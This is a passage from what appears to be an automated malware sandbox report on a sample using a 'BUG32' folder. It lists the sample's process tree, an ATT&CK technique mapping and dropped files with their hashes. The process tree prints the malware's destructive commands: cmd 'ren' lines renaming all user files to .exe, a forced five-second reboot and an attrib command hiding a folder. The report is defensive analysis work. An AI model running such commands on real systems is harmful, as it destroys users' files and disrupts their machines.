  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Documents\My Pictures\*.*" "*.exe"
  2⤵
  PID:1816
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Documents\My Videos\*.*" "*.exe"
  2⤵
  PID:2544
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Favorites\Links\*.*" "*.exe"
  2⤵
  PID:848
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Favorites\Links for United States\*.*" "*.exe"
  2⤵
  PID:2520
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Favorites\Microsoft Websites\*.*" "*.exe"
  2⤵
  PID:1040
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Favorites\MSN Websites\*.*" "*.exe"
  2⤵
  PID:2872
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Favorites\Windows Live\*.*" "*.exe"
  2⤵
  PID:2944
- C:\Windows\System32\shutdown.exe
  "C:\Windows\System32\shutdown.exe" -r -t 05
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2124
- C:\Windows\System32\attrib.exe
  "C:\Windows\System32\attrib.exe" +h "C:\BUG32"
  2⤵
  - Views/modifies file attributes
  PID:3032

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "309503532-606050216-1885523405-488530830942520142199720863-138899844-1010481095"
1⤵
PID:1700

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-212688916413169943831848109002810440238-1503675798109345853-528865522-905231637"
1⤵
PID:2344

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "17509030121489154947-109232171320650869-6022467121526968078-6951465032715651"
1⤵
PID:1524

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-776584284468283429-20029965062942529271909902081-1623688450-17150951531182784466"
1⤵
PID:1788

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-12088971169369113261171403409-973918452-1925210799993139151-1136052831750293839"
1⤵
PID:1040

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "18652878781223046208-1049730248-588180881-2025056371-914916141-18308493631349060092"
1⤵
PID:1716

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1665905022-20469312761750696236-2041741781-1453442784-112846726419832261-754670871"
1⤵
PID:1984

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "2030415126-2120249178-1815547522-3356026279014031091060997394-1600913578-169491555"
1⤵
PID:1696

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1794864786-2034707420-1805196069-2046103987988112850-985332764-268777722104113153"
1⤵
PID:1624

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "778860682104183807-6876457441918084938-18235586832085198565159542168871552769"
1⤵
PID:2760

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-2053216134-829222469-17573292761662382009-66707345586678947-1713248303-551547918"
1⤵
PID:2768

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1429373774-763109241786995332002173972-3310222456688677421761068513-1022143157"
1⤵
PID:1760

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1515443933-6826342471298281107-676509404-20776420581167076180575970234-415100831"
1⤵
PID:1976

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "950828726-1894130772-1071008815-2137591474-1610666240-1717540451-757828421139607178"
1⤵
PID:2676

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "866987511-8233472342056330400983456054-1613464808-1029341159-1269538781261054307"
1⤵
PID:872

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-98200605881300083565157901878045315-1556430475-1687343985487560031-1162109108"
1⤵
PID:760

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-615373586-13737818741174999856-2048505329-497322564456013509-281848855-1389154190"
1⤵
PID:2592

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-178560373-730725548115366974-649656036-420326976677970232040049299-1985811390"
1⤵
PID:1508

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1178893998-1149010594-13283981761416295802-153996882618025086-1514502968-737423536"
1⤵
PID:2568

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "17447709261496319991-12610702481855337385-1855063843666858855010254631735061390"
1⤵
PID:2184

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1379294877-358364271464829051-89360521114570183421131775636-125873812-1026248575"
1⤵
PID:628

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1372737613-1492545793-1135430535916330131-11427295701679964583-1574660173164258281"
1⤵
PID:2936

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1527420312-842719838-128029629320518582681701875044929044456782897780246302282"
1⤵
PID:2980

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "857125620705831499999022498-817723794-922416422-983323298-1108949496-973147801"
1⤵
PID:960

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1064638013-1816717719-1555775630259221230524904711-1748994087-1168099773-1389345068"
1⤵
PID:2036

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "8380205311137088619-479721887-14592612671026432718173829462417733640941674027274"
1⤵
PID:2020

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "333642535-645852066-1551514841617728146702955202086572308-1861817331593667108"
1⤵
PID:2832

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "549267301-52879272118380370112144144126-1754860674-210879419012005573911546314302"
1⤵
PID:2908

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-2142574861641602007-112353526627505636172039855117312398501945678401-886411042"
1⤵
PID:1644

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "2062339085-666353079-4112265841739167345-6601145031007621174-467720828-2004350644"
1⤵
PID:580

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-196398393164316732-1250368219984723062100850853-190803336-19561250332109351365"
1⤵
PID:1192

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "934472364-1163809695844452808363094591-823131993359092975777713812-1419719488"
1⤵
PID:2504

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "304524880102675431-1308497161166663139-836058160-4255369659883556001057458875"
1⤵
PID:2480

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "314154417-1362360225104043361667282649917650431221625464794-6082529111866910894"
1⤵
PID:2180

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1773927547-4342621671751695997-19803862911176724383-1125268450-3706448162041013775"
1⤵
PID:2732

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-2058705810-1440589394-7644260131487608363-1156536246-264184834777959810-1188330596"
1⤵
PID:1908

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1955128845-1024757968-229715158-73798968524950442-1915635328-11374427281265783537"
1⤵
PID:904

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "517556685620020697292177592-1008574588-1691257330-1997794857-266186792-2003525992"
1⤵
PID:2252

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1106140595-1256277098-1944278759-473598338-177291469-14701862171395060698827040768"
1⤵
PID:1900

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "127011895-13191895535829927716263068664931827941109671026322566081-591134994"
1⤵
PID:1116

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1296478455934806843-461350954-1641797911072396914-1767705233-1621327630801542943"
1⤵
PID:1400

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-8511429001684958514-1648263863-253586990128325150610812838621651107171744023317"
1⤵
PID:448

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1719496615-81509165016193826331890793831548974835-701614585-413800818-255717388"
1⤵
PID:944

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "382110870-1215806180-836696319-713675204202206626-1780029241836723165940140163"
1⤵
PID:1980

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-470420821-210781212918621719361365912460168163277283088053217583246151616915804"
1⤵
PID:2748

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1800287078-14995290431752969308-622383242536632933820617527-1042338280-309569891"
1⤵
PID:2616

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-846277966-1667357278-1450185786-610546952-4051006321930531873-763652279-1513606848"
1⤵
PID:2488

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1059469496-212201861-10592114420499959150281174519453761711610065297-1712562401"
1⤵
PID:1988

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1121449454-20148401091864181734204512472275146075710629028751271298274-1766852354"
1⤵
PID:2304

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "816450485-1159610493-823618510179786698216079394051671578178602998876-351898396"
1⤵
PID:2080

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "766128609-331720578-1952377397-19991474471243597817-498786109-1584972118597020208"
1⤵
PID:624

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-681738507124988568835707296035800535-40184625-13415478771722957396-847866110"
1⤵
PID:2016

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-419384074971033035441579270-1588698800109057445313690186881139859963346290424"
1⤵
PID:1732

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1794599042-769916545897698542-19745484301847062072-5609756741732230843-588862498"
1⤵
PID:2620

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "798333499-860863766-684471307-1849096749-35984013917855842251965971509200454005"
1⤵
PID:2508

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-3851983531917450174-1232233042170836392-1477968821-1141999553-1259670798-842776692"
1⤵
PID:1808

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-14687207094313795851318723532-1278162246-416841106824151813251016826-1344480875"
1⤵
PID:824

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "297541907-911936133-1155786579-835065108-3814483492015343598717195552-66792740"
1⤵
PID:2040

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1213217452-1455103554-35554895-1276100156-1423932819-1331686613-1205773635-607303656"
1⤵
PID:2804

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "7530109671993341933289269668-471707220-569249228-139153145016637715621812118076"
1⤵
PID:2772

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-3906852331966031325-16929162521565505907-21248487871939115232376986803-400798129"
1⤵
PID:2800

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "639684346-1175918452-1819756945-1120751674-903636350-6335311314528789131298845593"
1⤵
PID:1620

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "171613018-12480498601587513166-1141632978-91485054139332730215674992091363410146"
1⤵
PID:2096

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1138341000-12545377881031410909-1531285872-1365167440-17834898481082096858874166269"
1⤵
PID:568

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "367920577124754644912139852-4073479181075543178-850004136-330864431-1999418803"
1⤵
PID:480

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-9521291384891162351107709831-19557032093204803122893448471727965550721257373"
1⤵
PID:1532

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1166042512-1418818724-674785988-1995573110587503540-1846844318141629197-640120425"
1⤵
PID:2276

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1823283763-2076128205-9035708301862094326-1881035311166488149657220499-1935644157"
1⤵
PID:872

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-315889487595541434-847409661-33195755712169721321458209189881194953-11551931"
1⤵
PID:2440

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "16490444752028406173-167912608253997038490738670-78804002718526997731973588407"
1⤵
PID:964

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1264039724-19057513461777242412-172925572355353622-1878087121566002090-1900983448"
1⤵
PID:2084

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-118440676893024408837257579143355054454246200264796473-1847601903-1766336279"
1⤵
PID:2368

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-348628813-1894243372-1600123385-173889687214790850761202440085-1725371163944007210"
1⤵
PID:1020

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "19760570111109316403-2004870799-380683780-1515712603-223089083-2126225376565406176"
1⤵
PID:2432

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "835655628513201728-521252945-1243919759-11282116211381437569248860752-1400913753"
1⤵
PID:2360

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1282872685-1532875558-73107862187290989951575019042876464185716407-1489128819"
1⤵
PID:1560

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1509560548-1298881760502939970-820986701-1830641782-8709867541728949769-1695742029"
1⤵
PID:2204

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1974524491-191058503740895311-2024170726136023369453818163618190095041841603221"
1⤵
PID:2644

C:\Windows\system32\wlrmdr.exe
-s -1 -f 2 -t You are about to be logged off -m Windows will shut down in less than a minute. -a 3
1⤵
PID:2728

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x0
1⤵
PID:2424

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x1
1⤵
PID:1748

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Event Triggered Execution

T1546

Change Default File Association

T1546.001

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Event Triggered Execution

T1546

Change Default File Association

T1546.001

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\FD9.tmp\BUG32\ad.exe

Filesize
21KB

MD5
7999f942ff7190cb7c9f0e04d6dc3d41

SHA1
66c3743d7a3d0885a624600abd71486c63a52904

SHA256
8c52ba6df441fea41e87285a7a79e790773407b4d377730b4f834b067d355776

SHA512
9ea2f9e0e81b69895023da6a5e6f4850bdfb0e37d847a6086afaa3debb928673276fa149b2e8df154f6b0498191e5e7ab29c22bc415a761038435abcc4607cee

Download Submit
C:\Users\Admin\AppData\Local\Temp\FD9.tmp\BUG32\admin.vbs

Filesize
182B

MD5
052bc547687f4b9136a4d21ccb9be339

SHA1
897dfc37a8d89c9fbe390f9663495a2940457100

SHA256
2b1c03ec095baa8004183d2d9dc2a42d012c22969ee9923215cf73982e4bb122

SHA512
85e9a4092ed12d426fc5903c4f576b0085b3e794060382a87b8c8c871139a7968dd43b797088e303f4583374551102e4dc064b9b1e8af4fe89ab20799a981a31

Download Submit
C:\Users\Admin\AppData\Local\Temp\FD9.tmp\BUG32\bx.cur

Filesize
2KB

MD5
664a5626d7f9f5b991976b7c2fcd6176

SHA1
cafdd6179df723c7a7dcfa96a774fd2dc92ef40f

SHA256
691bbbad6b1d9b7c010cf63976e55e9c2b06ec0e9b29a7f16d8cf3b28e408cf8

SHA512
d4f1eb1dac1404219915f882aeac2544f82465d8bf84d9af0e03fa671a4f0798ca42fcd801cce9715c05a06732a03ec31189943a4a001137f3a022a4b89991b7

Download Submit
C:\Users\Admin\AppData\Local\Temp\FD9.tmp\BUG32\emptyone.vbs

Filesize
29B

MD5
9dbbdc7d01ea45c41f089d9c345b8100

SHA1
c0d429a5e3a6e729583e6bcf0599a62466ccfbe2

SHA256
9a3cfe496cf2c6b1efcba29320353194b3974ebeb49cadcbf83a72745c50fef6

SHA512
530e8dbe050c7a073ff0efbf6e117f6bf86ad856ec43b8a7faefc495f603503a6e18994d8cb778f66ad1077904f64c7189b5a2c10c8899ebb6dcaaf5c4f3461e

Download Submit
C:\Users\Admin\AppData\Local\Temp\FD9.tmp\BUG32\evl.wav

Filesize
1.0MB

MD5
aae7d0d3729fbb801616a93a92673ca6

SHA1
2ee99912ea0dc98696490e0edadf9e0d4bcfc924

SHA256
4aaeb6953578e8e5bbd1bd12d8a2238cda5cca97e192e68d6ab2ad28d56eb8f3

SHA512
67792bf28847e49a06a182e435abb75dcf896083ab100f4c9a5235e2a99fcfbc6c8157d27d87e674cdc25e142390d52959a4bb7b6bfb4c9bae91412e2d6a436b

Download Submit
C:\Users\Admin\AppData\Local\Temp\FD9.tmp\BUG32\icon.ico

Filesize
16KB

MD5
e22ab01202357460eec9871c74e6212b

SHA1
d16c867a6a32769b1cdab2ce2e37d4d7d48570b7

SHA256
1bd0dbdbe78d8218968cf3d5f203abf52824870a39610c505e8fba695fd329bb

SHA512
9535ad5c9d4b94ec525ab643e4f0ff37868465ae892f16c3465a5c0fc49a0bdb2075053bf1948502902e04996ef7dd3b8fa7dc6b9be4cb756ddfbd76544eb507

Download Submit
C:\Users\Admin\AppData\Local\Temp\FD9.tmp\BUG32\jaq.vbs

Filesize
4KB

MD5
e77aad670e295b9849a0d3d4f8501ec2

SHA1
0f0061209c15a0184bacfe87ff67c80a7283ded5

SHA256
c1ffac115387d943660d11acea27a06a920f505a0f3142969c25c9fa2e830b6f

SHA512
d2e9144a666600d407922a968ca8705f286d9b52ff43873a96a61fb39c63e11ad5d67e405cd5a95659d6309fc729b67269d19d405a9a2c9c8e18c2863515b760

Download Submit
C:\Users\Admin\AppData\Local\Temp\FD9.tmp\BUG32\js.bat

Filesize
50B

MD5
faf4749b646b63a1df551fe0141727cb

SHA1
eab00a1525581a6823d7216f3ec019012bab619f

SHA256
6b2831b0c5bcac2f5f57aab8028cd486f4c6c26364a70ecc76ff71d7f710049c

SHA512
28eea78034e7b6d09a32d9985d2731ec582c232425ee4d81a52d65aa5f3618f8d463c52caa881496116c47433140e7b1c79dc6add6b88ef2650ac7ae8cbfb67a

Download Submit
C:\Users\Admin\AppData\Local\Temp\FD9.tmp\BUG32\jsc.exe

Filesize
200KB

MD5
367b7179319f010f84b37acfc65082ba

SHA1
3c74537066cc79cf1505e9c79fe321b53ed3ab16

SHA256
035cc52a0abb363a463e21787dc061a3b42376ba0b082bc9c2d7e2399365862f

SHA512
d282fac9692b3ff1ab838b1a9a30727f7e166f92923503c65bca3bef85e75b300a1973d6fc1739f04f4058e743abdec29a08ecf1bda4730a02dcdaeb13749833

Download Submit
C:\Users\Admin\AppData\Local\Temp\FD9.tmp\BUG32\kill.bat

Filesize
398B

MD5
9e116f6eb010b8bff3211210e5b979fe

SHA1
d81b32e7845a614a38e3902239ce978c908af8c2

SHA256
cdeabd549e74e525e1baad3252246209667967399563f8be2b3275c8c276fc3e

SHA512
fd5687206d013577577d68c65215cd4636a616b83e12e5acbae0b619e543ff06f67d3881c8c85d0e6e0ee13dd7f5e20246b9edafea26cb0d6bb39ee4362966b6

Download Submit
C:\Users\Admin\AppData\Local\Temp\FD9.tmp\BUG32\msc.wav

Filesize
344KB

MD5
77bb6c1e12d47eff938d2efb28e7fb9d

SHA1
7f4fc62fde5eb3beb6def399ab525380cc4b8965

SHA256
926e24d85e847789a62f8ae3dae7af494ff329893a9a3c133b073b4b9cddbccb

SHA512
a19afaa90822b0081d51612aea2a41992f5c4eb2f39767cf9ed96b1ffc88bbb4203b4a04e9942c2cef445866817f56802ef099ba4f034949861dd3da6c4b3b2f

Download Submit
C:\Users\Admin\AppData\Local\Temp\FD9.tmp\BUG32\nokill.bat

Filesize
81B

MD5
00cf4877a187a307971f4fd650ac8c11

SHA1
2569ed07cbe4ab78d12cba571e83e1e1a7fc59b6

SHA256
8fdd9f0aa62b3e365850970187311192f5e101768edad88b550cc39a6909bdce

SHA512
039e90e66ed5fa8cd39a7525d1b7b0eba85b32d4954a41e60a113b61d3e1fda9b2356975a587873ca54cef129a894ac19e2d1c6d59e20a182412861b1205d4b9

Download Submit
C:\Users\Admin\AppData\Local\Temp\FD9.tmp\BUG32\runner.vbs

Filesize
277B

MD5
fe18d2d82dbfb9226cc424c0164252be

SHA1
e058b9eff08e3a7370d49d78634c8c201db8f0e5

SHA256
7922e452d5166bfa8e32e9392cb3b123cffc54b03218d8fcb584f5a2d97a0b96

SHA512
6540372f658f6397eb836d979b4208c6507b4aafdb8eacce772d645cdc1f418690e50c275c0a71c305f0a9201688bbe955fb5023aff223f18c0e83e32735c996

Download Submit
C:\Users\Admin\AppData\Local\Temp\FD9.tmp\BUG32\scrm.wav

Filesize
345KB

MD5
7ecd48eba5e5a27fb1aed4a39ee2b512

SHA1
b551665678040ce7d02bbcece9066fac5ff68ddf

SHA256
63af4081a26e633381caae0ea4b1756c4ae0a824596e6d5d17fdd2ee20979b3b

SHA512
51f593b0dcb5f45c8dca99f7e3fc703ddb8eafa11bc4e831ff6302f166a311d2a4ba46d51307a64dcfdd56af056ee8341f05c3ae26748fc3cf064e231d11596d

Download Submit
C:\Users\Admin\AppData\Local\Temp\FD9.tmp\BUG32\whitescr.png

Filesize
52KB

MD5
19d522cd15cc73b932f1ab4252d9d624

SHA1
27c0f04a38af403f84e1f2dc6965206e8b3f9b73

SHA256
78c21952f543624fe51f92bc2f35b17f652e4fed695228aa530370ff05083a04

SHA512
8c43e39a8affc34743b4e1521f85f578ea2b3b6f455d20983746ec4eb1f28f6f706889ba3ed1551b9a14ab3dc9723e719a48077de9fbd06dd77ee0f41b064a9c

Download Submit
C:\Users\Admin\AppData\Local\Temp\FD9.tmp\FDA.vbs

Filesize
513B

MD5
739efd2b7b9737d3d191e9fc5b983824

SHA1
6ad90c8406ae243fbb5ce07172447879205b525c

SHA256
1b51ef43c6e66683199c084b53b5b13d39a02ea6a94ca5f7293c7d68ba362583

SHA512
7fa6ead55103ccf506192643ce608b84969a8bda28c7bc2855907d14b6e756574258924766920ea661d68507fca772a12a652aab7c85466e0d97a444098cf59c

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp97136.WMC\allservices.xml

Filesize
546B

MD5
df03e65b8e082f24dab09c57bc9c6241

SHA1
6b0dacbf38744c9a381830e6a5dc4c71bd7cedbf

SHA256
155b9c588061c71832af329fafa5678835d9153b8fbb7592195ae953d0c455ba

SHA512
ef1cc8d27fbc5da5daab854c933d3914b84ee539d4d2f0126dc1a04a830c5599e39a923c80257653638b1b99b0073a7174cc164be5887181730883c752ba2f99

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp99601.WMC\serviceinfo.xml

Filesize
523B

MD5
d58da90d6dc51f97cb84dfbffe2b2300

SHA1
5f86b06b992a3146cb698a99932ead57a5ec4666

SHA256
93acdb79543d9248ca3fca661f3ac287e6004e4b3dafd79d4c4070794ffbf2ad

SHA512
7f1e95e5aa4c8a0e4c967135c78f22f4505f2a48bbc619924d0096bf4a94d469389b9e8488c12edacfba819517b8376546687d1145660ad1f49d8c20a744e636

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\74d7f43c1561fc1e.customDestinations-ms~RFf764846.TMP

Filesize
1KB

MD5
43485ed74d08dd5d5d85b7e9c73fb89d

SHA1
7b73e20456fea7de1c6fe2fa4925a6520f41ec81

SHA256
ee22b0b85c30d3ec58c79430c2b472d0f3c2f6a80d16cb8d29817c5c6f4700a0

SHA512
dde7d7fd4f3c05217ae2e2777b4888aed2a6b53347acee29f1a88b74018d57c4e8e58761f88799b2280f6f9caee16534c4d0d26036898ae46b4992c87519c12d

Download Submit
C:\bug32\list.lnk

Filesize
29KB

MD5
5f4a0fefe93a11cbeb670cd38bb9607c

SHA1
60f8f48a2e7888e15cd45e50cc2d6eca6b368d02

SHA256
72d679b6a0d8d81f3f9021472b47427e05614da1f51f8e45d2267b7f2aa56180

SHA512
396c67ecffdc2e9062310f48de9958065597cd79260e9e52db41bee96f88ae4e98a22d0c1b4e7768596aee8e6a3589eddfe095e8a94feb00e4e115ac4717c84d

Download Submit
memory/1748-872-0x0000000002AB0000-0x0000000002AB1000-memory.dmp

Filesize
4KB

Download
memory/2424-871-0x0000000002D90000-0x0000000002D91000-memory.dmp

Filesize
4KB

Download
memory/2668-733-0x000007FEF6C90000-0x000007FEF6D52000-memory.dmp

Filesize
776KB

Download
memory/2668-754-0x000007FEF6800000-0x000007FEF68D1000-memory.dmp

Filesize
836KB

Download
memory/2668-753-0x000007FEF59A0000-0x000007FEF5AC8000-memory.dmp

Filesize
1.2MB

Download
memory/2668-751-0x000007FEF6C90000-0x000007FEF6D52000-memory.dmp

Filesize
776KB

Download
memory/2668-741-0x000007FEF6800000-0x000007FEF68D1000-memory.dmp

Filesize
836KB

Download
memory/2668-740-0x000007FEF59A0000-0x000007FEF5AC8000-memory.dmp

Filesize
1.2MB

Download
memory/2904-734-0x00000000001A0000-0x00000000001A1000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

Errors

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads